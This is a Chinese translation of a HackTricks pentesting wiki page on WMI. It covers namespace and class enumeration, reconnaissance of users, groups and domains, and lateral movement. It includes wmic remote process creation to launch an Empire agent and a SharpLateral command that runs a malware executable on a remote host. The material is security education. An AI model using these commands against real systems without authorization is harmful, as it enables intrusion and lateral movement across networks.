hacktricks/windows-hardening/ntlm/wmicexec.md

6.2 KiB
Raw Blame History

WmicExec

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

工作原理解释

通过使用WMI可以在已知用户名和密码或哈希的主机上打开进程。通过Wmiexec执行命令提供半交互式的shell体验。

dcomexec.py 利用不同的DCOM端点此脚本提供类似于wmiexec.py的半交互式shell特别是利用ShellBrowserWindow DCOM对象。目前支持MMC20。应用程序、Shell Windows和Shell Browser Window对象。来源Hacking Articles

WMI基础知识

命名空间

WMI的顶级容器是\root采用类似目录样式的层次结构其中包含额外的目录称为命名空间。 列出命名空间的命令:

# Retrieval of Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

# Enumeration of all namespaces (administrator privileges may be required)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

# Listing of namespaces within "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace

在命名空间中可以使用以下命令列出类:

gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
gwmi -Namespace "root/microsoft" -List -Recurse

了解 WMI 类名(例如 win32_process及其所属的命名空间对于任何 WMI 操作至关重要。 列出以 win32 开头的类的命令:

Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"

调用一个类:

# Defaults to "root/cimv2" when namespace isn't specified
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus

方法

方法是 WMI 类的一个或多个可执行函数,可以被执行。

# Class loading, method listing, and execution
$c = [wmiclass]"win32_share"
$c.methods
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
# Method listing and invocation
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)

WMI枚举

WMI服务状态

用于验证WMI服务是否正常运行的命令

# WMI service status check
Get-Service Winmgmt

# Via CMD
net start | findstr "Instrumentation"

系统和进程信息

通过WMI收集系统和进程信息

Get-WmiObject -ClassName win32_operatingsystem | select * | more
Get-WmiObject win32_process | Select Name, Processid

对于攻击者来说WMI 是一个强大的工具,可以枚举有关系统或域的敏感数据。

wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list

手动远程WMI查询

通过精心构建命令可以远程查询WMI以获取特定信息如本地管理员或已登录用户。

要在远程计算机上隐蔽地识别本地管理员和已登录用户可以通过特定的WMI查询实现。wmic还支持从文本文件中读取以同时在多个节点上执行命令。

要通过WMI远程执行进程例如部署Empire代理需要使用以下命令结构成功执行将返回值“0”

wmic /node:hostname /user:user path win32_process call create "empire launcher string here"

这个过程展示了WMI远程执行和系统枚举的能力突出了它对系统管理和渗透测试的实用性。

参考资料

自动化工具

{% code overflow="wrap" %}

SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe

{% endcode %}

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式